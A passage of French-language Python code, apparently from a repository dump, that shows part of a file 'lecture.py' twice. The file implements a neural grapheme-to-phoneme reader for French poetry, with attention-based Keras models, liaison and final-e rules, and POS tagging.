ortho1[-1] if derniere_lettre in dico_liaisons_simples.keys(): phon1 = "{}{}".format(phon1, dico_liaisons_simples[derniere_lettre]) if derniere_lettre == 'r' and phon1[-1] == "e": # comme "premier" phon1 = "{}{}".format(phon1[:-1], "ER") if derniere_lettre == 'n': # comme "bon", "certain", "commun" dernier_phoneme = phon1[-1] if (ortho1 in mots_nasale_simples) or (dernier_phoneme == "1"): phon1 = "{}{}".format(phon1, 'n') else: if dernier_phoneme == "§": phon1 = "{}{}".format(phon1[:-1], "On") if dernier_phoneme == "@" and ortho1[-2:] == "an": phon1 = "{}{}".format(phon1[:-1], "an") if dernier_phoneme == "5": if ortho1[-2:] == "en": phon1 = "{}{}".format(phon1[:-1], "En") if ortho1[-2:] == "in": phon1 = "{}{}".format(phon1[:-1], "in") if ortho1[-3:] in ["ein", "ain"]: phon1 = "{}{}".format(phon1[:-2], "En") return phon1 def e_final(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs): e_potentiel = (ortho1[-1] == 'e') or (ortho1[-2:] == 'es') or (ortho1[-3:] == 'ent') son_final = phon1[-1] son_initial = phon2[0] lettre_initiale = ortho2[0] consonnes_p = ['k', 'p', 'l', 't', 'R', 'j', 'f', 's', 'd', 'Z', 'n', 'b', 'v', 'g', 'v', 'g', 'm', 'z', 'w', 'S', 'N', '8', 'G', 'x'] lien_mots = (son_final in consonnes_p) and ((son_initial in consonnes_p) or lettre_initiale == 'h') if e_potentiel and lien_mots: phon1 = "{}°".format(phon1) elif e_potentiel and (son_final in consonnes_p): # "e" et liaison quand le 2e mot commence par une voyelle phon1_e = "{}°".format(phon1) phon1_e_liaison = liaison(ortho1, ortho2, phon1_e, phon2, nat1, nat2, phrase, **kwargs) if phon1_e != phon1_e_liaison: phon1 = phon1_e_liaison return phon1 def liaisons_tokens(mots, prononciation, pos_mots, phrase): n = len(prononciation) for i in range(n - 1): prononciation[i] = liaison(mots[i], mots[i + 1], prononciation[i], prononciation[i + 1], pos_mots[i][1], pos_mots[i + 1][1], phrase.lower()) return prononciation def e_final_tokens(mots, prononciation, pos_mots, phrase): n = len(prononciation) for i in range(n - 1): prononciation[i] = e_final(mots[i], mots[i + 1], prononciation[i], prononciation[i + 1], pos_mots[i][1], pos_mots[i + 1][1], phrase) return prononciation class Lecteur: """"Classe definissant le lecteur """ def __init__(self, tx, ty, l2idx, p2idx, dico_unique, dico_multiple, n_brnn1=90, n_h1=80, net=None, blank="_"): self.tx = tx self.ty = ty self.l2idx = l2idx self.p2idx = p2idx self._dico_unique = dico_unique self._ortho_unique = dico_unique.keys() self._dico_multiple = dico_multiple self._ortho_multiple = list(set([w for w, _ in dico_multiple.keys()])) self.n_brnn1 = n_brnn1 self.n_h1 = n_h1 self.net = net self.blank = blank self.count_lecture = 0 # setters et getters def _get_dico_unique(self): return self._dico_unique def _set_dico_unique(self, dico_unique): self._dico_unique = dico_unique self._ortho_unique = dico_unique.keys() def _get_ortho_unique(self): return self._ortho_unique def _set_ortho_unique(self, valeur): raise AttributeError("ortho_unique ne peut pas etre modifie") def _get_dico_multiple(self): return self._dico_multiple def _set_dico_multiple(self, dico_multiple): self._dico_multiple = dico_multiple self._ortho_multiple = list(set([w for w, _ in dico_multiple.keys()])) def _get_ortho_multiple(self): return self._ortho_multiple def _set_ortho_multiple(self, valeur): raise AttributeError("ortho_multiple ne peut pas etre modifie") dico_unique = property(fget=_get_dico_unique, fset=_set_dico_unique) ortho_unique = property(fget=_get_ortho_unique, fset=_set_ortho_unique) dico_multiple = property(fget=_get_dico_multiple, fset=_set_dico_multiple) ortho_multiple = property(fget=_get_ortho_multiple, fset=_set_ortho_multiple) # methodes def one_hot_from_list(self, data): """ :param data: liste des couples (mot, phonemes) :return: """ m = len(data) n_l = len(self.l2idx.keys()) n_p = len(self.p2idx.keys()) x = np.zeros((m, self.tx + 1, n_l)) y = np.zeros((m, self.ty + 1, n_p)) for i, mp in enumerate(data): mot, pron = ("{m}{b}".format(m=mp[0], b=self.blank * (self.tx + 1 - len(mp[0]))), # rajout des _ pour # signifier la fin "{m}{b}".format(m=mp[1], b=self.blank * (self.ty + 1 - len(mp[1])))) for j, c in enumerate(mot): x[i, j, self.l2idx[c]] = 1 for j, c in enumerate(pron): y[i, j, self.p2idx[c]] = 1 return x, y # Modelisation def model(self): n_l = len(self.l2idx) n_p = len(self.p2idx) x = Input(shape=(self.tx, n_l), name="mot") c0 = Input(shape=(self.n_h1,), name='c0') c = c0 h0 = Input(shape=(self.n_h1,), name='h0') h = h0 outputs = list() # initialisation de la derniere couche # c'est parti a = Bidirectional(LSTM(units=self.n_brnn1, return_sequences=True, name="LSTM_orthographe"))(x) a = Dropout(0.2, name="dropout_LSTM_orthographe")(a) for t in range(self.ty): # Attention h_rep = RepeatVector(self.tx, name="att_repeat_phoneme{}".format(t))(h) ah = Concatenate(axis=-1, name="att_concat_phoneme{}".format(t))([h_rep, a]) energies = Dense(units=self.n_h1, activation="tanh", name="att_caractere_phoneme{}".format(t))(ah) energies = Dense(units=1, activation="relu", name="att_moyenne_phoneme{}".format(t))(energies) alpha = Activation("softmax", name="att_alpha_phoneme{}".format(t))(energies) context = Dot(axes=1, name="att_application_phoneme{}".format(t))([alpha, a]) h, c = GRU(units=self.n_h1, activation='tanh', recurrent_activation='sigmoid', return_state=True, name="GRU_phoneme{}".format(t))(inputs=context, initial_state=c) h = Dropout(rate=0.1, name="dropout_phoneme{}".format(t))(h) c = Dropout(rate=0.1, name="dropout_memory_phoneme{}".format(t))(c) outy = Dense(activation="softmax", units=n_p, name="softmax_phoneme_{}".format(t))(h) outputs.append(outy) net = Model(inputs=[x, c0, h0], outputs=outputs) return net def compile_train(self, x, y, epochs=10, batch_size=64, opt=Adam()): m = x.shape[0] if self.net is None: self.net = self.model() self.net.summary() self.net.compile(optimizer=opt, loss="categorical_crossentropy", metrics=["accuracy"]) h0 = csr_matrix((m, self.n_h1)) c0 = csr_matrix((m, self.n_h1)) y_list = list(y.swapaxes(0, 1)) self.net.fit([x, c0, h0], y_list, epochs=epochs, batch_size=batch_size) return self.net def regex_lecteur(self, phrase, trad_numbers=False): if trad_numbers: reg0 = "0-9" else: reg0 = "" skip = [" ", ".", '-', self.blank] # elements a ne pas prendre en compte lors de l'expression reguliere trait_dunion = False for c in self.l2idx.keys(): if c == '-': trait_dunion = True if c not in skip: reg0 = "{}{}".format(reg0, c) if trait_dunion: reg0 = "{}-".format(reg0) reg = "[{}]+".format(reg0) res = RegexpTokenizer(reg).tokenize(phrase) return res def tirets_appostrophes(self, a_decouper): # appostrophes if a_decouper[0] == "'": a_decouper = a_decouper[1:] a_decouper = [splitted for splitted in a_decouper.split("'") if len(splitted) > 0] if len(a_decouper) > 1: for i in range(len(a_decouper) - 1): a_decouper[i] = "{}'".format(a_decouper[i]) # traits-d'union decoupe = list() if a_decouper[-1][-1] == '-': a_decouper[-1] = a_decouper[-1][:-1] for partie in a_decouper: partie_splitted = [par for par in partie.split("-") if len(par) > 0] if len(partie_splitted) > 1: for i in range(1, len(partie_splitted)): partie_splitted[i] = "-{}".format(partie_splitted[i]) decoupe.extend(partie_splitted) # recherche dans le vocabulaire tokens = list() # liste de tokens a retourner while len(decoupe) > 0: # decoupe est reduite a mesure que tokens se remplit p = len(decoupe) if decoupe[0][0] == '-': # si le premier caractere est un trait d'union, on l'enleve decoupe[0] = decoupe[0][1:] element = "".join(decoupe) # on forme un mot avec les elements element_know = (element in self.ortho_unique) or (element in self.ortho_multiple) while not element_know and p > 1: # le nombre d'elements diminue jusqu'a ce qu'un mot connu apparaisse p -= 1 element = "".join(decoupe[:p]) element_know = (element in self.ortho_unique) or (element in self.ortho_multiple) tokens.append(element) decoupe = decoupe[p:] # on eleve de decoupe les parties tokenisees return tokens def tokenizer(self, phrase): """ Tokeniseur maison qui sépare autour des espaces et les appostophes des mots plus courts que deux chars :param phrase :return: phrase tokenisee """ # minuscules phrase = phrase.lower() # oe et ae phrase = phrase.replace("œ", "oe") phrase = phrase.replace("æ", "ae") # appostrophes phrase = phrase.replace("’", "'") # regex tokens = self.regex_lecteur(phrase, trad_numbers=True) # appostrophes/traits-d'unions i = 0 while i < len(tokens): tok = tokens[i] if any(appostrophe_ou_trait in tok for appostrophe_ou_trait in ['-', "'"]) and len(tok) > 1: tokens.pop(i) tokens_to_add = self.tirets_appostrophes(tok) for token_to_add in tokens_to_add: tokens.insert(i, token_to_add) i += 1 else: i += 1 # nombres for i, tok in enumerate(tokens): if tok.isdigit(): tokens[i] = tradn(int(tok)) phrase = " ".join(tokens) tokens = self.regex_lecteur(phrase, trad_numbers=False) return tokens def tokenizer_poem(self, poem): print(self.count_lecture) self.count_lecture += 1 poem_tokens = list() for strophe in poem: strophe_tokens = list() for ver in strophe: ver_tokens = self.tokenizer(ver) strophe_tokens.append(ver_tokens) poem_tokens.append(strophe_tokens) return poem_tokens def lire_nn(self, mots): # one hot m = len(mots) n_l = len(self.l2idx) x = np.zeros((m, self.tx + 1, n_l)) for i, mot in enumerate(mots): mot = str(mot) mot = "{m}{b}".format(m=mot, b=self.blank * (self.tx + 1 - len(mot))) lettres = [self.l2idx[lettre] for lettre in mot] for j, lettre in enumerate(lettres): x[i, j, lettre] = 1 # predictions h0 = np.zeros((m, self.n_h1)) c0 = np.zeros((m, self.n_h1)) y = self.net.predict(x=[x, c0, h0]) # dictionnaire indices vers phoneme idx2p = dict() for p, idx in self.p2idx.items(): idx2p[idx] = p # conversion one hot vers mots n_p = len(self.p2idx) pron_int = np.zeros((m, n_p, self.ty + 1)) for i in range(self.ty + 1): pron_int[:, :, i] = y[i] pron_int = pron_int.argmax(axis=1) # one hot vers indices phonemes # creation dico prononciation = dict() for i, mot in enumerate(mots): prononciation_mot = "" for idx in pron_int[i, :].tolist(): prononciation_mot = "{phons}{p}".format(phons=prononciation_mot, p=idx2p[idx]).replace(self.blank, "") prononciation[mot] = prononciation_mot return prononciation def lire_mots(self, mots): # dicos mots_unique = set() mots_multiples = set() mots_nn = set() pos_mots = pos_tag(mots) dico_nn = 0 for mot in mots: if mot in self.ortho_unique: mots_unique.update([mot]) elif mot in self.ortho_multiple: mots_multiples.update([mot]) else: mots_nn.update([mot]) if len(mots_multiples) > 0: for m, p in pos_mots: if m in mots_multiples and (m, p) not in self.dico_multiple.keys(): mots_multiples.remove(m) mots_nn.update([m]) if len(mots_nn) > 0: dico_nn = self.lire_nn(mots_nn) prononciation = list() for i, mot in enumerate(mots): prononciation_mot = "" if mot in mots_unique: prononciation_mot = self.dico_unique[mot] elif mot in mots_multiples: prononciation_mot = self.dico_multiple[pos_mots[i]] elif mot in mots_nn: prononciation_mot = dico_nn[mot] prononciation.append(prononciation_mot) return prononciation def lire_vers(self, vers, count=False): """ Lit un vers :param vers: Chaine de caracteres du vers :param count: Si l'on souhaite compter le nombre de vers que l'on lit :return: vers lu sous la forme d'une string de phonemes non espaces """ if count: print(self.count_lecture) self.count_lecture += 1 tokens = self.tokenizer(vers) pos = pos_tag(tokens) mots_lus = self.lire_mots(tokens) mots_lus_avec_e = e_final_tokens(tokens, mots_lus, pos, vers) mots_lus_liaisons = liaisons_tokens(tokens, mots_lus_avec_e, pos, vers) vers_lu = "".join(mots_lus_liaisons) return vers_lu def lire_strophe(self, strophe, ponctuation=None): if ponctuation is None: ponctuation = ['.', ',', '!', '?', "…"] # separation en phrases text_strophe = " ".join(strophe) reg0 = "".join(ponctuation) reg0 = "(?:(?![{caracteres_a_eviter}]).)+".format(caracteres_a_eviter=reg0) phrases_strophe = [phrase for phrase in RegexpTokenizer(reg0).tokenize(text_strophe) if len(phrase) > 0] # lecture des phrases phrases_lues = list() pos_phrases = list() for phrase in phrases_strophe: tokens_phrase = self.tokenizer(phrase) phrases_lues.extend(self.lire_mots(tokens_phrase)) pos_phrases.extend(pos_tag(tokens_phrase)) return phrases_lues, pos_phrases def lire_poem(self, poem_tokens, poem_text): print(self.count_lecture) self.count_lecture += 1 poem_phonemes_tokens = list() assert len(poem_tokens) == len(poem_text), "Les listes de textes et des tokens ont des longueurs differentes" for idx_s, strophe in enumerate(poem_tokens): strophe_text = poem_text[idx_s] strophe_phonemes_tokens = list() pos_strophe = list() phrase_a_lire = list() for ver_tokens in strophe: n_tok_ver = len(ver_tokens) phrase_a_lire.extend(ver_tokens) strophe_phonemes_tokens.append(n_tok_ver * ['']) pos_strophe.append(n_tok_ver * ['']) phrase_lue = self.lire_mots(phrase_a_lire) pos_phrase = pos_tag(phrase_a_lire) i = 0 j = 0 for idx, phoneme_mot in enumerate(phrase_lue): while len(strophe_phonemes_tokens[j]) == 0: strophe_phonemes_tokens[j] = "" pos_strophe[j] = [] i = 0 j += 1 strophe_phonemes_tokens[j][i] = phoneme_mot pos_strophe[j][i] = pos_phrase[idx] i += 1 if i == len(strophe_phonemes_tokens[j]): i = 0 j += 1 for idx in range(len(strophe_phonemes_tokens)): if len(strophe_phonemes_tokens[idx]) > 1: strophe_phonemes_tokens[idx] = e_final_tokens(strophe[idx], strophe_phonemes_tokens[idx], pos_strophe[idx], strophe_text[idx]) strophe_phonemes_tokens[idx] = liaisons_tokens(strophe[idx], strophe_phonemes_tokens[idx], pos_strophe[idx], strophe_text[idx]) strophe_phonemes_tokens[idx] = "".join(strophe_phonemes_tokens[idx]) if strophe_phonemes_tokens == [[]]: strophe_phonemes_tokens = [''] poem_phonemes_tokens.append(strophe_phonemes_tokens) return poem_phonemes_tokens def evaluate_model_from_lists(self, liste, batch_size=256): """ Mesure la performance d'un modele sur une liste de donnees :param liste: donnees sous forme de liste sur lesquelles evaluer le modele :param batch_size: taille du batch pour calculer les performances """ x, y_inv = self.one_hot_from_list(liste) y = list(y_inv.swapaxes(0, 1)) h0 = csr_matrix((x.shape[0], self.n_h1)) c0 = csr_matrix((x.shape[0], self.n_h1)) results = self.net.evaluate([x, c0, h0], y, batch_size=batch_size) print('loss:', results[0]) for i in range(0, self.ty): print('acc char {}:'.format(i), results[i + self.ty + 2]) def mispredicted(self, t_l, batch_size=256): unique_couples = list(set(t_l)) # recuperation des elements uniques missed = list() # liste des éléments mal predits x, y = self.one_hot_from_list(data=unique_couples) m = x.shape[0] y_a = y.argmax(axis=2) print(y_a.shape) c0 = csr_matrix((m, self.n_h1)) h0 = csr_matrix((m, self.n_h1)) y_hat_list = self.net.predict(x=[x, c0, h0], batch_size=batch_size) pred_phon = list() # dictionnaire indice vers phoneme idx2p = dict() for p, idx in self.p2idx.items(): idx2p[idx] = p for i in range(self.ty + 1): mat_yi_hat = y_hat_list[i].argmax(axis=1).reshape((m, 1)) pred_phon.append(mat_yi_hat) y_hat_a = np.concatenate(pred_phon, axis=1) # tranformation des mauvaises predictions en mots for i in range(m): bonne_prediction = pd.Series(y_hat_a[i, :] == y_a[i, :]).all() if not bonne_prediction: vecteur_predit = y_hat_a[i, :].tolist() prononciation_predite = "".join([idx2p[idx] for idx in vecteur_predit]).replace(self.blank, "") missed.append([unique_couples[i][0], unique_couples[i][1], prononciation_predite]) return missed def save(self, path): self.net.save(path) if __name__ == "lecture": os.environ['JAVAHOME'] = r"C:\Program Files (x86)\Java\jre1.8.0_261\bin\java.exe"
lecture.py
from trad_chiffre_mot import tradn import os import numpy as np from scipy.sparse import csr_matrix import pandas as pd from nltk.tag import StanfordPOSTagger from nltk.tokenize import RegexpTokenizer from keras import Input from keras.layers import Bidirectional, LSTM, Dropout, RepeatVector, Concatenate, Dense, Activation, Dot, GRU from keras.models import Model from keras.optimizers import Adam from sklearn.model_selection import train_test_split def filter_length(df, n=8, phon="2_phon", sup_n=True): phonemes = df.loc[:, phon] if sup_n: filtre = phonemes.apply(lambda x: len(x) >= n) else: filtre = phonemes.apply(lambda x: len(x) < n) return df.loc[filtre, :] def sample(df, m=1000, mots="1_ortho", phon="2_phon", occurances="10_freqlivres", ln_dist=False, seed=23): """ :param df: pd.dataframe contenant le lexique :param mots: "1_ortho" variable de df contenant les orthographes :param phon: "2_phon" variable de df contenant les phonemes :param occurances: "10_freqlivres" variable de df contenant les frequences des mots :param ln_dist: False passage au log :param m: 1000 taille des donnees :param seed: graine aleatoire de l'echantillonage :return: liste de tuples (mot, prononciation), liste contenant les probabilités """ list_w2p = [] list_occ = [] for row in df[[mots, phon, occurances]].to_numpy(): w, p, o = tuple(row) list_w2p.append([w, p]) list_occ.append(o) list_occ = np.array(list_occ) # normalisation if ln_dist: list_occ = np.log(list_occ + 1) list_occ = list_occ / np.sum(list_occ) # format liste list_tuples = [tuple(couple) for couple in list_w2p] list_occ = list_occ.tolist() n_occ = len(list_tuples) np.random.seed(seed) distr = np.random.choice(a=range(n_occ), size=m, p=list_occ).tolist() return [list_tuples[i] for i in distr] def train_dev(df, test_size=0.01, m=1000, forced_train=None, mots="1_ortho", phon="2_phon", occurances="10_freqlivres", ln_dist=False, seed=23): """ :param df: pd.dataframe contenant le lexique :param test_size: 0.01 :param m: 1000 taille des donnees de train :param forced_train: liste de mots a avoir dans les donnees d'entrainement :param mots: "1_ortho" variable de df contenant les orthographes :param phon: "2_phon" variable de df contenant les phonemes :param occurances: "10_freqlivres" variable de df contenant les frequences des mots :param ln_dist: False passage au log :param seed: graine aleatoire du train_test_split et de l'echantillonage :return: listes de tuples des train """ if forced_train is None: forced_train = [] train_df, test_df = train_test_split(df, test_size=test_size, random_state=seed) if len(forced_train) > 0: # rajout des mots dans les donnees de test forced_idx = test_df[mots].apply(lambda x: x in forced_train) forced = test_df.loc[forced_idx, :] train_df = train_df.append(forced, ignore_index=True) test_df = test_df.loc[-forced_idx, :] train_s = sample(train_df, m=m, mots=mots, phon=phon, occurances=occurances, ln_dist=ln_dist, seed=seed) test_s = sample(test_df, m=int(m * test_size), mots=mots, phon=phon, occurances=occurances, ln_dist=ln_dist, seed=seed) return train_s, test_s def model_test(tx, ty, n_l, n_p, n_brnn1=32, n_h1=64): x = Input(shape=(tx, n_l)) c0 = Input(shape=(n_h1,), name='c0') h0 = Input(shape=(n_h1,), name='h0') c = c0 h = h0 outputs = list() # initialisation de la derniere couche # c'est parti a = Bidirectional(LSTM(units=n_brnn1, return_sequences=True, name="LSTM_mot"))(x) a = Dropout(0.2, name="dropout_LSTM_orthographe")(a) for t in range(ty): # Attention h_rep = RepeatVector(tx, name="att_repeat_phoneme{}".format(t))(h) ah = Concatenate(axis=-1, name="att_concat_phoneme{}".format(t))([h_rep, a]) energies = Dense(units=n_h1, activation="tanh", name="att_caractere_phoneme{}".format(t))(ah) energies = Dense(units=1, activation="relu", name="att_moyenne_phoneme{}".format(t))(energies) alpha = Activation("softmax", name="att_alpha_phoneme{}".format(t))(energies) context = Dot(axes=1, name="att_application_phoneme{}".format(t))([alpha, a]) h, c = GRU(units=n_h1, activation='tanh', recurrent_activation='tanh', return_state=True, name="LSTM_phoneme{}".format(t))(inputs=context, initial_state=c) h = Dropout(rate=0.1, name="dropout_phoneme{}".format(t))(h) c = Dropout(rate=0.1, name="dropout_memory_phoneme{}".format(t))(c) outy = Dense(activation="softmax", units=n_p, name="LSTM_{}".format(t))(h) outputs.append(outy) net = Model(inputs=[x, c0, h0], outputs=outputs) return net def pos_tag(mots, jar=os.path.join(".", "models", "stanford-postagger", "stanford-postagger-3.8.0.jar"), mdl=os.path.join(".", "models", "stanford-postagger", "french-ud.tagger")): try: pos_tagger = StanfordPOSTagger(mdl, jar, encoding='utf8') except LookupError: java_path = r"C:\Program Files (x86)\Java\jre1.8.0_261\bin\java.exe" os.environ['JAVAHOME'] = java_path pos_tagger = StanfordPOSTagger(mdl, jar, encoding='utf8') tagged = pos_tagger.tag(mots) tags = [g for m, g in tagged] forced_det = ["au", "aux"] absent_of_table = ["PART", "SCONJ"] if any(item in mots for item in forced_det) or any(item in tags for item in absent_of_table): for i, couple in enumerate(tagged): mot = couple[0] gram = couple[1] if mot in forced_det: tagged[i] = (mot, "DET") if gram == "PART": tagged[i] = (mot, "ADV") if gram == "SCONJ": tagged[i] = (mot, "CONJ") return tagged def check_liaison(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs): """ Fonction qui verifie si la liaison est possible entre deux mots :param ortho1: orthographe du mot en position 1 :param ortho2: orthographe du mot en position 2 :param phon1: phonemes du mot en position 1 :param phon2: phonemes du mot en position 2 :param nat1: nature du mot en position 1 :param nat2: nature du mot en position 2 :param phrase: phrase de contexte :return: booleen sur la possibilite de liaison """ voyelles_p = kwargs.get("voyelles_p", ['a', 'E', '§', 'o', 'O', '1', 'i', '5', 'e', 'u', '@', '°', '9', 'y', '2']) y_p = kwargs.get("y_p", ['w', 'j', '8']) consonnes_liaisons = {'d': ['d'], 'p': ["p"], 'r': ["R"], 's': ['s', 'z'], 't': ['t'], 'x': ['s', 'z'], 'n': ['n', 'G'], 'z': ['z', 's']} liables = False mot2_voyelle = ((phon2[0] in y_p) or (phon2[0] in voyelles_p)) and (ortho2[0] != 'h') if mot2_voyelle: mot1_consonne_liaison = (ortho1[-1] in consonnes_liaisons.keys()) and\ (phon1[-1] not in consonnes_liaisons[ortho1[-1]]) if mot1_consonne_liaison: mot1_dern_son_voyelle = (ortho1[-1] in consonnes_liaisons.keys()) and (phon1[-1] in voyelles_p) pas_ponctuation = (" ".join([ortho1, ortho2]) in phrase) or ("-".join([ortho1, ortho2]) in phrase) if pas_ponctuation: if (nat1 in ["NUM", "DET", "ADJ"]) and (nat2 in ["NOUN", "PROPN"]): liables = True elif ortho1 in ["on", "nous", "vous", "ils", "elles", "en", "tout"] and nat2 in ["AUX", "VERB"]: liables = True elif nat1 in ["AUX", "VERB"] and mot1_dern_son_voyelle: liables = True elif nat1 in ["ADP"]: liables = True elif (nat1 in ["NOUN"]) and (ortho1[-1] in ['s']) and (nat2 in ["ADJ"]): liables = True elif (nat1 == "ADV") and (nat2 in ["ADV", "ADJ", "NOUN"]): liables = True elif (ortho1 == "quand") and (nat2 not in ["AUX", "VERB"]): liables = True elif (ortho1 == "plus") and (ortho2 == "ou"): liables = True elif (ortho1 == "tout") and (ortho2 in ["à", "autour"]): liables = True return liables def liaison(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs): dico_liaisons_simples = kwargs.get("dico_liaisons", {'d': 't', 'p': 'p', 's': 'z', 't': 't', 'x': 'z', 'z': 'z'}) mots_nasale_simples = kwargs.get("mots_nasale_simples", ["aucun", "bien", "en", "on", "rien", "un", "non", "mon", "ton", "son"]) liaison_a_faire = check_liaison(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs) if liaison_a_faire: derniere_lettre = ortho1[-1] if derniere_lettre in dico_liaisons_simples.keys(): phon1 = "{}{}".format(phon1, dico_liaisons_simples[derniere_lettre]) if derniere_lettre == 'r' and phon1[-1] == "e": # comme "premier" phon1 = "{}{}".format(phon1[:-1], "ER") if derniere_lettre == 'n': # comme "bon", "certain", "commun" dernier_phoneme = phon1[-1] if (ortho1 in mots_nasale_simples) or (dernier_phoneme == "1"): phon1 = "{}{}".format(phon1, 'n') else: if dernier_phoneme == "§": phon1 = "{}{}".format(phon1[:-1], "On") if dernier_phoneme == "@" and ortho1[-2:] == "an": phon1 = "{}{}".format(phon1[:-1], "an") if dernier_phoneme == "5": if ortho1[-2:] == "en": phon1 = "{}{}".format(phon1[:-1], "En") if ortho1[-2:] == "in": phon1 = "{}{}".format(phon1[:-1], "in") if ortho1[-3:] in ["ein", "ain"]: phon1 = "{}{}".format(phon1[:-2], "En") return phon1 def e_final(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs): e_potentiel = (ortho1[-1] == 'e') or (ortho1[-2:] == 'es') or (ortho1[-3:] == 'ent') son_final = phon1[-1] son_initial = phon2[0] lettre_initiale = ortho2[0] consonnes_p = ['k', 'p', 'l', 't', 'R', 'j', 'f', 's', 'd', 'Z', 'n', 'b', 'v', 'g', 'v', 'g', 'm', 'z', 'w', 'S', 'N', '8', 'G', 'x'] lien_mots = (son_final in consonnes_p) and ((son_initial in consonnes_p) or lettre_initiale == 'h') if e_potentiel and lien_mots: phon1 = "{}°".format(phon1) elif e_potentiel and (son_final in consonnes_p): # "e" et liaison quand le 2e mot commence par une voyelle phon1_e = "{}°".format(phon1) phon1_e_liaison = liaison(ortho1, ortho2, phon1_e, phon2, nat1, nat2, phrase, **kwargs) if phon1_e != phon1_e_liaison: phon1 = phon1_e_liaison return phon1 def liaisons_tokens(mots, prononciation, pos_mots, phrase): n = len(prononciation) for i in range(n - 1): prononciation[i] = liaison(mots[i], mots[i + 1], prononciation[i], prononciation[i + 1], pos_mots[i][1], pos_mots[i + 1][1], phrase.lower()) return prononciation def e_final_tokens(mots, prononciation, pos_mots, phrase): n = len(prononciation) for i in range(n - 1): prononciation[i] = e_final(mots[i], mots[i + 1], prononciation[i], prononciation[i + 1], pos_mots[i][1], pos_mots[i + 1][1], phrase) return prononciation class Lecteur: """"Classe definissant le lecteur """ def __init__(self, tx, ty, l2idx, p2idx, dico_unique, dico_multiple, n_brnn1=90, n_h1=80, net=None, blank="_"): self.tx = tx self.ty = ty self.l2idx = l2idx self.p2idx = p2idx self._dico_unique = dico_unique self._ortho_unique = dico_unique.keys() self._dico_multiple = dico_multiple self._ortho_multiple = list(set([w for w, _ in dico_multiple.keys()])) self.n_brnn1 = n_brnn1 self.n_h1 = n_h1 self.net = net self.blank = blank self.count_lecture = 0 # setters et getters def _get_dico_unique(self): return self._dico_unique def _set_dico_unique(self, dico_unique): self._dico_unique = dico_unique self._ortho_unique = dico_unique.keys() def _get_ortho_unique(self): return self._ortho_unique def _set_ortho_unique(self, valeur): raise AttributeError("ortho_unique ne peut pas etre modifie") def _get_dico_multiple(self): return self._dico_multiple def _set_dico_multiple(self, dico_multiple): self._dico_multiple = dico_multiple self._ortho_multiple = list(set([w for w, _ in dico_multiple.keys()])) def _get_ortho_multiple(self): return self._ortho_multiple def _set_ortho_multiple(self, valeur): raise AttributeError("ortho_multiple ne peut pas etre modifie") dico_unique = property(fget=_get_dico_unique, fset=_set_dico_unique) ortho_unique = property(fget=_get_ortho_unique, fset=_set_ortho_unique) dico_multiple = property(fget=_get_dico_multiple, fset=_set_dico_multiple) ortho_multiple = property(fget=_get_ortho_multiple, fset=_set_ortho_multiple) # methodes def one_hot_from_list(self, data): """ :param data: liste des couples (mot, phonemes) :return: """ m = len(data) n_l = len(self.l2idx.keys()) n_p = len(self.p2idx.keys()) x = np.zeros((m, self.tx + 1, n_l)) y = np.zeros((m, self.ty + 1, n_p)) for i, mp in enumerate(data): mot, pron = ("{m}{b}".format(m=mp[0], b=self.blank * (self.tx + 1 - len(mp[0]))), # rajout des _ pour # signifier la fin "{m}{b}".format(m=mp[1], b=self.blank * (self.ty + 1 - len(mp[1])))) for j, c in enumerate(mot): x[i, j, self.l2idx[c]] = 1 for j, c in enumerate(pron): y[i, j, self.p2idx[c]] = 1 return x, y # Modelisation def model(self): n_l = len(self.l2idx) n_p = len(self.p2idx) x = Input(shape=(self.tx, n_l), name="mot") c0 = Input(shape=(self.n_h1,), name='c0') c = c0 h0 = Input(shape=(self.n_h1,), name='h0') h = h0 outputs = list() # initialisation de la derniere couche # c'est parti a = Bidirectional(LSTM(units=self.n_brnn1, return_sequences=True, name="LSTM_orthographe"))(x) a = Dropout(0.2, name="dropout_LSTM_orthographe")(a) for t in range(self.ty): # Attention h_rep = RepeatVector(self.tx, name="att_repeat_phoneme{}".format(t))(h) ah = Concatenate(axis=-1, name="att_concat_phoneme{}".format(t))([h_rep, a]) energies = Dense(units=self.n_h1, activation="tanh", name="att_caractere_phoneme{}".format(t))(ah) energies = Dense(units=1, activation="relu", name="att_moyenne_phoneme{}".format(t))(energies) alpha = Activation("softmax", name="att_alpha_phoneme{}".format(t))(energies) context = Dot(axes=1, name="att_application_phoneme{}".format(t))([alpha, a]) h, c = GRU(units=self.n_h1, activation='tanh', recurrent_activation='sigmoid', return_state=True, name="GRU_phoneme{}".format(t))(inputs=context, initial_state=c) h = Dropout(rate=0.1, name="dropout_phoneme{}".format(t))(h) c = Dropout(rate=0.1, name="dropout_memory_phoneme{}".format(t))(c) outy = Dense(activation="softmax", units=n_p, name="softmax_phoneme_{}".format(t))(h) outputs.append(outy) net = Model(inputs=[x, c0, h0], outputs=outputs) return net def compile_train(self, x, y, epochs=10, batch_size=64, opt=Adam()): m = x.shape[0] if self.net is None: self.net = self.model() self.net.summary() self.net.compile(optimizer=opt, loss="categorical_crossentropy", metrics=["accuracy"]) h0 = csr_matrix((m, self.n_h1)) c0 = csr_matrix((m, self.n_h1)) y_list = list(y.swapaxes(0, 1)) self.net.fit([x, c0, h0], y_list, epochs=epochs, batch_size=batch_size) return self.net def regex_lecteur(self, phrase, trad_numbers=False): if trad_numbers: reg0 = "0-9" else: reg0 = "" skip = [" ", ".", '-', self.blank] # elements a ne pas prendre en compte lors de l'expression reguliere trait_dunion = False for c in self.l2idx.keys(): if c == '-': trait_dunion = True if c not in skip: reg0 = "{}{}".format(reg0, c) if trait_dunion: reg0 = "{}-".format(reg0) reg = "[{}]+".format(reg0) res = RegexpTokenizer(reg).tokenize(phrase) return res def tirets_appostrophes(self, a_decouper): # appostrophes if a_decouper[0] == "'": a_decouper = a_decouper[1:] a_decouper = [splitted for splitted in a_decouper.split("'") if len(splitted) > 0] if len(a_decouper) > 1: for i in range(len(a_decouper) - 1): a_decouper[i] = "{}'".format(a_decouper[i]) # traits-d'union decoupe = list() if a_decouper[-1][-1] == '-': a_decouper[-1] = a_decouper[-1][:-1] for partie in a_decouper: partie_splitted = [par for par in partie.split("-") if len(par) > 0] if len(partie_splitted) > 1: for i in range(1, len(partie_splitted)): partie_splitted[i] = "-{}".format(partie_splitted[i]) decoupe.extend(partie_splitted) # recherche dans le vocabulaire tokens = list() # liste de tokens a retourner while 